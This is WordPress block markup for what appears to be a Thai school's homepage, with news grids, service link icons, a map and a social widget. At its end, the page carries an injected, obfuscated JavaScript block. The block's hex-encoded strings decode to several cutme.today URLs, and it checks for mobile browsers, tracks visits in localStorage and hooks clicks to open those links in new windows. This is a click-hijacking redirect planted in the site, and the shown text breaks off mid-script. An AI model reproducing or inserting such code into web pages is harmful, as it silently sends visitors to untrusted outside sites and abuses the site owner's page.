{\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 